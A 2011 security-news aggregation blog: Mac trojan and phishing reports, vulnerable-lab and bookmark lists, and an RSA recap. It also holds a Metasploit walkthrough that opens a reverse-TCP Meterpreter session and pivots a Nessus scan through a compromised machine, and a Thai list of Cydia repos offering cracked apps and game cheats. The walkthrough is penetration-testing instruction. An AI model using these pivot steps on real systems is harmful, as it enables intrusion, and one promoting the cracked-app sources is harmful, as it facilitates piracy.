Feb 26, 2011

Mac OS X backdoor Trojan, now in beta?

OSX/MusMinim-A screenshotIt appears there is a new backdoor Trojan in town and it targets users of Mac OS X. As even the malware itself admits, it is not yet finished, but it could be indicative of more underground programmers taking note of Apple's increasing market share.
SophosLabs analyzed the sample we received and determined that it is a variant of a well-known remote-access trojan for Windows known as darkComet.
The Mac version is very basic and there appears to be a mix of German and English in the user interface. Its functions include:
* Placing text files on the desktop
* Sending a restart, shutdown or sleep command
* Running arbitrary shell commands
* Placing a full screen window with a message that only allows you to click reboot
* Sending URLs to the client to open a website
* Popping up a fake "Administrator Password" window to phish the target
Screenshot of fake Admin credentials dialog
Here is an excerpt from the default text that is displayed in the full screen window with the reboot button:
"I am a Trojan Horse, so i have infected your Mac Computer. I know, most people think Macs can't be infected, but look, you ARE Infected!
I have full controll over your Computer and i can do everything I want, and you can do nothing to prevent it.
So, Im a very new Virus, under Development, so there will be much more functions when im finished."
SophosLabs has published protection for our customers as OSX/MusMinim-A. Trojans like this are frequently distributed through pirated software downloads, torrent sites, or anywhere you may download an application expecting to need to install it.

It could also be dropped by a vulnerability in your browser, plugins and other applications. Patching is an important part of protection on all platforms.
Fortunately our products can detect and remove Trojans like this, and for home use they're free! If you would like to install Sophos Anti-Virus for Mac Home Edition, click on the banner below.
DownloadFree Anti-Virus for Mac
Download Sophos Anti-Virus for Mac Home Edition

Source: http://nakedsecurity.sophos.com/2011/02/26/mac-os-x-backdoor-trojan-now-in-beta/

Pentest lab vulnerable servers-applications list

In this post I’m going to present some useful resources to learn about penetration testing and where to use exploitation tools and techniques in a safe and legal environment. This list contain a set of  deliberately insecure LiveCDs and virtual machines designed to be used as targets for enumeration, web exploitation, password cracking and reverse  engineering.

Similar to the de-ice Cd’s and pWnOS, holynix is an ubuntu server vmware image that was deliberately built to have security holes for the purposes of penetration testing. More of an obstacle course than a real world example.

WackoPicko is a website that contains known vulnerabilities. It was first used for the paper Why Johnny Can’t Pentest: An Analysis of Black-box Web Vulnerability Scanners found: http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf

De-ICE PenTest LiveCDs
The PenTest LiveCDs are the creation of Thomas Wilhelm, who was transferred to a penetration test team at the company he worked for. Needing to learn as much about penetration testing as quickly as possible, Thomas began looking for both tools and targets. He found a number of tools, but no usable targets to practice against. Eventually, in an attempt to narrow the learning gap, Thomas created PenTest scenarios using LiveCDs.

Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.

Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications.

Web Security Dojo
A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo

LAMPSecurity training is designed to be a series of vunlerable virtual machine images along with complementary documentation designed to teach linux,apache,php,mysql security.

Damn Vulnerable Web App (DVWA)
Damn Vulnerable Web App is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

This is the Hacking-Lab LiveCD project. It is currently in beta stadium. The live-cd is a standardized client environment for solving our Hacking-Lab wargame challenges from remote.

Moth is a VMware image with a set of vulnerable Web Applications and scripts, that you may use for:

Damn Vulnerable Linux (DVL)
Damn Vulnerable Linux  is everything a good Linux distribution isn’t. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks. DVL isn’t built to run on your desktop – it’s a learning tool for security students.

pWnOS is on a “VM Image”, that creates a target on which to practice penetration testing; with the “end goal” is to get root. It was designed to practice using exploits, with multiple entry points

Virtual Hacking Lab
A mirror of deliberately insecure applications and old softwares with known vulnerabilities. Used for proof-of-concept /security training/learning purposes. Available in either virtual images or live iso or standalone formats.

Badstore.net is dedicated to helping you understand how hackers prey on Web application vulnerabilities, and to showing you how to reduce your exposure.

Katana is a portable multi-boot security suite which brings together many of today’s best security distributions and portable applications to run off a single Flash Drive. It includes distributions which focus on Pen-Testing, Auditing, Forensics, System Recovery, Network Analysis, and Malware Removal. Katana also comes with over 100 portable Windows applications; such as Wireshark, Metasploit, NMAP, Cain & Able, and many more.

HACKXOR [webapp hacking game] 

Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism&difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc 



BodgeIt Store  

is a vulnerable web application which is currently aimed at people who are new to pen testing



Exploit KB Vulnerability Web App.
This vulnerability web app. was developed by NightRanger. It's good practice to develop a PHP based site from scratch in order to learn the basic of PHP and MySQL and it is a fully functional web site with a content management system based. You can download as a source code package or VMware Image.

PuzzleMall is a vulnerable web application designed for training purposes.
It is prone to a variety of different session puzzle exposures, which can be detected and exploited using different session puzzling sequences.



Edit:: Update the link. Thank you Francisco Sáa Muñoz.
Update:  Add link and Add some to the list
Update 2011-05-23: Add puzzlemall and update broken link.

RSA Conference 2011 recap: What we learned

As most of our readers know, the RSA Conference is information security's biggest annual event, and it's a great bellwether for what's top of mind among enterprise infosec practitioners.
Typically, each conference has one prevalent theme: NAC, cloud security and APT are a few that we've seen in recent years. This year, no dominant theme emerged, which I think is an indicator that the security industry is in a transition period: enterprises are focused on restarting delayed security initiatives, many major vendors are focused inward on finishing or integrating recent acquisitions, and analysts are waiting to see which of the next crop of security startups will bear fruit.
Still, I thought it would be worth highlighting a handful of our most interesting takeaways, all of which you can read more about on our RSA Conference 2011 coverage page.

Signature-based antimalware ain't what it used to be: Signature-based antimalware, the cash cow for the big AV companies, isn't going away anytime soon, but the writing is on the wall in that "traditional" antivirus software is becoming less effective and, in turn, less important. It's time to start learning how to rely on better technologies, like heuristics, behavior-based detection and, yes, even whitelisting.

Microsoft smack in the middle of cyberwar campaigns: In my exclusive interview with Scott Charney, Microsoft's corporate vice president of Trustworthy Computing, he admitted the increasing number of nation-states seeking exploits in the software giant's wares to conduct Internet espionage contributed to Microsoft's record number of security bulletins in 2010. Even though Microsoft had no new security product announcements and a somewhat lower profile than usual at RSA, it was clear after my conversation with Charney that Microsoft is committed to being perceived as a leader and an innovator in information security, even if that means recognizing some unpleasant realities about today's threat landscape. 

Some talking about IPv6 security issues; few actually listening: What happens when you transition to a new Internet Protocol system that has exponentially more address space? Well, nobody really knows yet, but the smart money says there will be a host of security issues that many aren't thinking about, one of which will be that IP address blacklisting will get a whole lot harder. Some would go so far as to say it fundamentally breaks vulnerability assessment methodology as we know it today. These are complex issues, and as addresses begin to run out and IPv6 becomes the only alternative, I was surprised not to hear more widespread concern. 

How risky is my cloud?: Finally, there was still plenty of talk about cloud computing security, everything from contracts to compliance and virtualization. And, in case you missed it, we've consolidated all of our secure cloud coverage to our newest website, SearchCloudSecurity.com. Check it out.
One last note, if I had to put in my early wagers on the RSA Conference 2012 theme, it would be mobile device management. If, as somebody predicted, mobile attacks increase and data loss results, there will be a rapid rise in demand for security tools to manage, monitor and enforce policy on a variety of mobile platforms.

Microsoft's "Web Tracking Protection" submission accepted by the W3C

The W3C has accepted a submission from Microsoft on "Web Tracking Protection", and has now started the formal standardisation process, the next step in which will be a workshop at Princeton University on 28-29 April 2011. In a posting, the W3C states that due to significant public concern, the submission from Microsoft is timely, and that the "W3C had already decided to strengthen its focus on privacy."

That public concern focusses on behavioural targeting and other such techniques used by advertisers to compile profiles on users in order to serve precisely tailored advertising. Many advertising networks offer the option of opting out of such tracking and the submission from Microsoft is intended to develop a standardised framework for a more general ability to opt out of such tracking.
The submission suggests two parts to the standard: first, filter lists, which would enforce a user's privacy preferences "by preventing the user agent from making unwanted requests to web servers that track users"; and secondly, an HTTP header and DOM property indicating the user's preference which would be used by a web server if it is set up in order to respect the user's privacy. This second part is identical to a plan proposed by Mozilla, which has been a strong supporter of the Do Not Track approach favoured by the US Federal Trade Commission.
The W3C states that it hopes to build a broad consensus on this subject and hopes to involve a broad range of stakeholders in the development of the standard: web site operators, privacy advocates and "also those who make use of user tracking to provide their services." To this end, the W3C invites discussion and input concerning the workshop to public-privacy@w3.org. Interested parties can subscribe to this mailing list through public-privacy-request@w3.org. The corresponding mail archive can be accessed here.

Source: http://www.h-online.com/security/news/item/Microsoft-s-Web-Tracking-Protection-submission-accepted-by-the-W3C-1198023.html

Mass phishing on credit card services brand using fake SSL

In February, Symantec observed a mass phishing attack on a popular credit card services brand. There were a large number of phishing URLs in the attack, which were all secured using Secure Socket Layer (SSL). So what makes this phishing attack stand out from the rest?
Phishing websites that use SSL are uncommon and are typically seen in very small numbers. To create a phishing site that uses SSL, the phisher would either have to create a fake SSL certificate or attack a legitimate certificate to attain an encryption for the site. In both cases, Symantec has observed that phishing sites using SSL are less frequent. In this particular attack, there were over a hundred phishing URLs that used a fake SSL certificate. This was achieved by hosting the phishing site on one single IP address which resolved to several domain names. That is, although there were abundant URLs in the attack, they all resolved to a single IP address and contained the same webpage. The SSL certificate was an expired one, with its issue date of the year 2006 and an expiration date of 2007. The phisher’s primary motive behind creating an encrypted phishing site is to help the site appear authentic and to convince users that the site is safe.

The phishing site spoofed a credit card services brand, which targeted customers of Switzerland and its phishing pages were in French. End-users were also asked to provide login credentials of a popular e-commerce brand. Hence, phishers attempted to harvest confidential information of two brands with the same phishing attack. The phishing site was hosted on servers based in California, USA.
The phishing site asks for the confidential information in a two step process. The first step is an identity verification of the user. Here, the user is asked to enter name, date of birth, address, email with password of the e-commerce brand, and mother’s maiden name. The second step asks for banking data including bank name, bank ID, name of card holder, card type, card number, personal code, card expiration date, and CVV number. Upon entering the requested information, the phishing site redirects to a blank webpage. If users fell victim to the phishing site, phishers would have stolen their information for financial gain.
Internet users are advised to follow best practices to avoid phishing attacks, such as:
  • Do not click on suspicious links in email messages.   
  • Avoid providing any personal information when answering an email.
  • Never enter personal information in a pop-up screen.
  • Frequently update your security software, such as Norton Internet Security 2011, which protects you from online phishing.

Source: http://www.symantec.com/connect/blogs/mass-phishing-credit-card-services-brand-using-fake-ssl

Feb 25, 2011

The Open Penetration Testing Bookmarks Collection

...is just that, a collection of handy bookmarks I initially collected that aid me in my day to day work or I find in the course of research. They are not all inclusive and some sections need to be parsed but they are all good reference materials. I find having this Hackery folder in Firefox an easy way to reference syntax, tricks, methods, and generally facilitate and organize research.
Opening it up to everyone will facilitate a knowledge transfer. Hopefully the initial set will grow and expand.

How it's working atm:

First off, we need help. OCD organizational people and people who can contribute or sort out the best links. Comment on the wiki if you wanna pitch in. Free beer at con's ;)
The whole bookmarks html file is ready for import to firefox off of the downloads section. As people submit new links we will add them and restructure the categories as they expand. Otherwise the wiki page should have all the links piecemeal should you not decide to download the whole folder (which is lame).

How to submit your bookmarks:

Since a bookmarks file is not really what you usually use a code repository for we opted just to use the download and wiki sections of google code.
If you have suggestions or a few links to submit, leave a comment on the wiki page.
If you think you have a large set of bookmarks you think can contribute email us and we'll add you to the contributors section.

The general categories are:

Created for forums that will help in both tool usage, syntax, attack techniques, and collection of scripts and tools. Needs some help. I don't really frequent too many underground forums but i actually find nice one-off scripts and info i can roll into my own code in these places. Would like to add more.
Blogs Worth It:
What the title says. There are a LOT of pentesting blogs, these are the ones i monitor constantly and value in the actual day to day testing work.
OSINT Sites:
OSINT has become a hug part of the pentest methodology. From fueling social engineering, to passively profiling your target infrastructure. There are subfolders for Presentaions on how-to, sites for profiling people and organizations, ans sites for profiling technical assets. This section is doing okay atm.
Exploits and Advisories
Places to go for exploit descriptions, white-papers, and code. Needs work.
Exploitation Intro
If you'd like to get into exploit dev, these are really the guides and docs that will start you off in the right direction. Since Exploit dev is not my primary occupation this section could always use help.
Agile Hacking
Mostly collections of guides on non-tool command line hacking syntax. Heavily inspired by Ed Skoudis and PDP of GNUCitizen. Needs work.
Cheatsheets and fu!
Random cheatsheets for heavily used tools and reference. Need a lot of work.
*nix <3
Collection of *nix command line knowledge and distributions for pentesting. Needs work.
Open source classes relating to hacking and penetration testing. I would really like to find more of these.
Some practical and some high level methodologies for hacking related activities. Needs a lot of work.
If you want to practice your fu, these links to test sites, blogs about practice, and lab setup-how to's will help. needs work, would like to convert to direct links as well.
Semi-parsed, nor has it really been inspected for relevancy. More of just a place i dump links for new tools and tools i use often. Needs a LOT of help, parsing, additions, etc.
Web Vectors
I do a lot of web stuff. Here are some web vectors and associated useful docs and cheatsheets on each of them. Could always use more in these sections.
Misc Sec
Not categorized, misc, and randomness.
It's not even parsed yet, nor has it really been inspected for relevancy. needs lots of work.
Hacker Media
Needs additions to main pages of con video archives. It's an okay start though. Needs work.

Source: http://code.google.com/p/pentest-bookmarks/

Nessus Through SOCKS Through Meterpreter

Earlier this year Mark Baggett wrote an article on running a Nessus scan through Meterpreter. It involved installing an SSH server on the compromised machine and then using it as a SOCKS4 proxy to forward the scan traffic through to the target machine (Nessus Scanning through a Metasploit Meterpreter Session). It was a great idea but I don't like installing tools on clients machines if I can avoid it so never got round to doing it on a test.
Recently Zate Berg added the Nessus plug-in to Metasploit to let you control a Nessus server from the Metasploit command line. Without thinking it through my initial reaction was "Great I can now scan through a Meterpreter pivot". Once I thought about it and read Carlos's article New Nessus Plug-In For Metasploit I realised that the Nessus server was still running on the attacker machine and so didn't have access to the tunnel.
After asking a few questions on various mailing lists egypt pointed me at the auxiliary/server/socks4a module which would allow me to do the same as the SSH server but without having to install anything on the compromised machine. After a bit of playing, some partially successful scans and more questions to the list I got a completed scan through a Meterpreter pivot. The key seems to be that you need to be running at least Ruby 1.9 (I'm running 1.9.1) not 1.8.7 as I originally tried, withouth it the proxy seems to get congested and locks up.
Below is a walk through of the steps I went through to get the scan. The actors in this play are:
  • - The attacking machine
  • - The compromised machine
  • - The machine I want to scan
There is no normal route from the 192 network into the 10 network, the router at prevents this.
robin@attacker metasploit $ ./msfconsole

< DigiNinja >
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 613 exploits - 309 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r10774 updated today (2010.10.21)

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 31337
lport => 31337
msf exploit(handler) > set lhost
lhost =>
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (749056 bytes) to
[*] Meterpreter session 1 opened ( -> at 2010-10-22 10:38:18 +0100

msf exploit(handler) > route add 1
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server
msf auxiliary(socks4a) > 
Check the tunnel is working. I don't speak SMB but if you do this and see the OK then the connection has been made and you can just enter some rubbish and hit return a few times, the other end will drop the connection pretty quickly. Pick a port you know, or expect, to be open on the target machine, SMB is usually a good choice for a Windows box.
root@attacker sbin # proxychains nc 445
ProxyChains-3.1 (http://proxychains.sf.net)
Before you start Nessus with proxychains you'll need to modify the proxychains config (/etc/proxychains.conf). In my default config I needed to add the following line to the end.
socks4 1080
And now start Nessus
root@attacker sbin # proxychains ./nessus-service -D 
Scans take a LONG time, with a default Nessus policy it took me 4242 seconds to scan the compromised machine, that is nearly an hour and a quarter so I've created a minimal policy to work with for this type of scanning. First we load the nessus module the connect to it, check the policies and finally fire off a scan.
msf auxiliary(socks4a) > load nessus
[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf auxiliary(socks4a) > nessus_connect robin@localhost
[+] Password:
[*] Connecting to https://localhost:8834/ as robin
[*] Authenticated
msf auxiliary(socks4a) > nessus_policy_list
[+] Nessus Policy List

ID  Name        Comments
--  ----        --------4   Minimal MS3   noping2   Web1   All

msf auxiliary(socks4a) > nessus_scan_new 4 "Quick Windows"
[*] Creating scan from policy number 4, called "Quick Windows" and scanning
[*] Scan started.  uid is 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans

Scan ID                                               Name           Owner  Started            Status   Current Hosts  Total Hosts
-------                                               ----           -----  -------            ------   -------------  -----------60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee  Quick Windows  robin  12:39 Oct 22 2010  running  0              1

[*] You can:
[+]             Import Nessus report to database :      nessus_report_get <reportid>
[+]             Pause a nessus scan :                   nessus_scan_pause <scanid>
Now sit back for a LONG wait. You can check the status with nessus_scan_status
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans

Scan ID                                               Name           Owner  Started            Status   Current Hosts  Total Hosts
-------                                               ----           -----  -------            ------   -------------  -----------60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee  Quick Windows  robin  12:39 Oct 22 2010  running  0              1
When it finall finishes you can check the results and load them into your Metasploit database
msf auxiliary(socks4a) > db_connect msf.db
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don't count on it
[*] Creating a new database file... 
[*] Successfully connected to the database
[*] File: msf.db                    

msf auxiliary(socks4a) >  nessus_report_get 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] importing 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*]   Done!                                           
[+] Done
msf auxiliary(socks4a) > db_hosts 


address        address6  arch  comm  comments  created_at               info  mac                name                          os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at               svcs  vulns  workspace
-------        --------  ----  ----  --------  ----------               ----  ---                ----                          ---------  -------  -------  -----  -------  -----  ----------               ----  -----  ---------                                       2010-10-22 14:09:22 UTC        00:13:3b:04:03:52  CORP_DC                                                                    alive  2010-10-22 14:09:22 UTC  5     6      default
So, there we have it, a full Nessus scan through a Meterpreter pivot with everything done in memory on the compromised machine. A very neat and tidy attack.

Source: http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php

Feb 24, 2011

รวมสุดยอด Cydia Repository Source / List

ช่วงที่มี jailbreak tools ออกมาใหม่ เพื่อแหกคุก iOS หลายคน คึกคัก หยิบไอโฟนมาเล่นกันไม่หยุด  อยากใช้ ไอโฟน ไอแพดกันให้คุ้ม เลยอยากหา  Jailbroken /Cydia App มาลงกัน  เพื่อเพิ่มลูกเล่น และความสามารถของไอโฟน แต่ Cydia App บางตัว ก็ฝากไว้ที่ Cydia Repository Source อื่นนอกเหนือจากที่ Cydia ใส่มาให้แล้ว ซึ่ง Cydia Source ดี ๆ มีที่ไหนบ้าง aPptUbe เอามาแนะนำให้เรียบร้อยแล้วกับ รวมชุด Cydia Repository Source / List แนะนำ ที่ควรเพิ่มลงในเครื่อง ยิ่งเหมาะสำหรับมือใหม่ iPhone 4 ที่ใช้ iOS 4 ด้วย ซึ่งเช็คมาเรียบร้อยแล้วใช้งานได้ Source น่าเชื่อถืออยู่มานาน และคุ้มค่าแก่การเพิ่มเข้าไป (แนะนำว่า เพิ่มเฉพาะที่ต้องการใช้ อย่าเพิ่มมากไป เดี๋ยว Cydia จะยิ่งช้า)
หวังว่าคงถูกใจะกันนะ ส่วนใครมี repo list เด็ด ๆ อยากแนะนำ  comment กันไว้นะ
วิธีการเพิ่ม Repository Source ใน Cydia
  • เปิด Cydia
  • กดปุ่ม Manage ด้านล่าง
  • เลือก Sources
  • กด "Edit" ที่ด้านบนขวา
  • กด "Add" แล้วใส่ URL ของ Repo นั้นๆ  ลงไป
  • กด Done 
Cydia Repository Source ฝั่งไทย
  • Source: http://www.smart-mobile.com/cydia 
สำหรับ cydia app ที่มีพูดถึงกันในเว็บบอร์ดของ smart-mobile ทั้ง App สำหรับคนไทย เช่น Database เบอร์มือถือของคนไทย สำหรับ MCallShow, รวม POI สำหรับ App iGO for iPhone, BKK Transit รวมข้อมูลระบบขนส่งมวลชนอย่าง BTS, MRT, เรือด่วนเจ้าพระยา แล้วก็ Theme สวย ๆ ที่มีการอวดกันในเว็บบอร์ดด้วย และ App ดี ๆ ของต่างประเทศ ที่บางตัวมีแก้ไอ ให้หายเจ็บคอแล้วด้วย
  • Source: iAppdev Thai Package http://iappdev.com/i
สำหรับ Keyboard ภาษาไทย สำหรับ iPhone, iPod Touch และ iPad และ App ที่คุณ Rainbows เจ้าของเว็บเป็นคนพัฒนา
  •  Source: http://www.iphoneinthailand.com/cydia/
Cydia App หลายๆ ตัวที่คนไทยชอบใช้กัน ก็รวมไว้ที่นี่แล้ว เช่น Thai Carrier logo (แต่ใช้ไม่ได้กับ iOS4) , MCallShow Database เบอร์เมืองไทย
Cydia Repository Source ฝั่งอินเตอร์
  • Source: Hackulo.us http://cydia.hackulo.us 
ที่นี่ไม่อะไรเยอะ แต่มีแต่ของเด็ด ๆ อย่าง "AppSync" ทุกเวอร์ชั่น App ที่ช่วยให้ Sync App ที่ติด DRM กับ iTune ได้, App สำหรับติดตั้ง app และ game ผ่านตัวเครื่องไอโฟน อย่าง installous , Hackulous Security, MetaDataRemovr  ส่วนนักแฮกทั้งหลายที่นี่ก็มี Tool ดีหลายตัว อย่างเช่น crack tool สำหรับ crack app
  • Source: SiNfuL iPhone Repo http://www.sinfuliphonerepo.com/
สำหรับ Cracked Jailbroken / Cydia App น่าเอามาทดลองใช้หลายตัวใช้หลายตัวอยู่ในที่นี้แหละ โดยข้อมูลเพิ่มเติมหาอ่านจากเว็บบอร์ดได้เลย  
  •  Source: xSellize http://cydia.xsellize.com/
แหล่งรวม Ringtone อย่างเยอะ และบางริงโทนก็หายาก รวมทั้ง Theme สวย ๆ ก็หาได้ที่นี่ และแหล่งสำหรับ Cracked Jailbroken / Cydia App น่าเอามาทดลองใช้หลายตัว อยู่ในที่นี้แหละ โดยข้อมูลเพิ่มเติมหาอ่านจากเว็บบอร์ดได้เลย
  • Source:   http://cydia.iphone.org.hk/apt
Source จากฮ่องกง สำหรับ แฟน iPhone Game โดยเฉพาะ เพราะที่นี่รวมตัว patch เพื่อโกงเกม โกงเงิน โกงไอเท็ม ต่างๆ ของเกมดังอย่าง เกม Battle Field, Fishing King, Fieldrunners, Need for Speed, Plants vs Zombies, The Sims 3, We Rule, Zenonia 2  หรือพวก อีบุ๊ค (e-book) หนังสือดังอย่างแฮรี่ พอตเตอร์
  • Source:  Hack Store http://cydia.myrepospace.com/HackStor/
สำหรับ Cracked Jailbroken / Cydia App น่าเอามาทดลองใช้หลายตัวอยู่ในที่นี้แหละ โดยข้อมูลเพิ่มเติมหาอ่านจาก Blog HackStore ได้เลย
  • Source:  http://ispaziorepository.com
Source ของจากอิตาลี แต่เป็นแหล่งรวม ringtone, lockscreen, SMS theme, theme และพวก tweak สำหรับ iPhone ที่น่าใช้อีกที ข้อมูลเพิ่มเติมก็ติดตามได้จาก Blog แต่เป็นภาษาอิตาลี (ใช้ Google Translate เอาแล้วกัน)
  •  Source:   http://theiphonespotrepo.net/apt
สำหรับ Jailbroken / Cydia App ที่แก้ไอแล้ว หลายตัวที่เผื่ออยาก ทดลองใช้อยู่ในที่นี้แหละ ที่นี่อัพเดต app ไว้ที่ repo source รวดเร็ว ตัวใหม่ ๆ หาได้ที่นี่ โดยข้อมูลเพิ่มเติมหาอ่านจาก The iPhone Spot ได้เลย

Cydia Repository Source สำหรับลง App เฉพาะ
  • Source: NERV Repository  http://www.cmdshft.ipwn.me/apt/
สำหรับติดตั้ง Push Doctor (ตัวแก้ปัญหา Push ไม่ทำงานสำหรับเครื่อง Hactivatived Phone), Push Donor, YouTube Fix
  • Source: BENM.AT Repo http://repo.benm.at/
สำหรับติดตั้ง Frash (Flash Player) และ Frash Toggle วิธีการติดตั้ง Frash อ่านที่นี่
  • Source : iPhone Khmer http://iphonekhmer.com/
สำหรับติดตั้ง Thai Keyboard 4 rows โดยนักพัฒนาจากเขมร คียบอร์ดภาษาไทย สี่แถว เหมือนแป้นพิมพ์คอมพิวเตอร์
  • Source : iWooWiz http://repo.woowiz.net/
สำหรับติดตั้ง เครื่องมือจำเป็นสำหรับการเจลเบรค iOS 4.1 Spirit2pwn ด้วย sn0wbreeze 2
  •  Source: http://apps.iphoneislam.com/  
สำหรับติดตั้ง FaceIT-3GS ตัวปรับแต่ง iPhone 3GS ที่ใช้ iOS 4.1 ให้สามารถใช้ FaceTime ผ่าน WiFi ได้
  • Source: http://cydia.myrepospace.com/iClick/ (ล่าสุด!)
สำหรับติดตั้ง iClick keyboard Thai for iOS4.x
  • Source: http://repo.bingner.com (ล่าสุด!)
สำหรับเครื่อง iPhone ที่ติดล็อค ต้องการ active เครื่องโดยไม่ต้องใช้วิธี Hacktivation รายละเอียดอ่านที่นี่ 

Cydia Repository Source พื้นฐานที่มาพร้อมกับ Cydia
  • Source: Big Boss http://apt.thebigboss.org/repofiles/cydia/
Source ที่ขึ้นชื่อว่ามี App, Theme, Ringtone ที่มากที่สุด สามารถติดตามข่าวสารได้จาก BigBoss Blog
  • Source: ModMyi.com http://apt.modmyi.com/
Source ที่ใหญ่อีกแห่งหนึ่ง App และ Theme ดี ๆ หลายตัวหาได้จากที่นี่ ติดตามข่าวได้จาก เว็บบอร์ดของ ModMyi 
  • Source: Ultrasn0w http://repo666.ultrasn0w.com
สำหรับหาตัว Unlock Tool อย่าง ultrasn0w
  • Source: Telesphoreo Tangelo http://apt.saurik.com
แจกจ่าย Unix Software สำหรับ iPhone เป็น Source ของผู้สร้าง Cydia เอง
  • Source: ZodTTD & MacCiti http://cydia.zodttd.com/repo/cydia/
สำหรับ Emulator เกม Gameboy, PlayStation สำหรับ iPhone และ Theme, Ringtone ต้องที่นี่เลย

Source: http://apptube.exteen.com/20100807/cydia-repository-source-list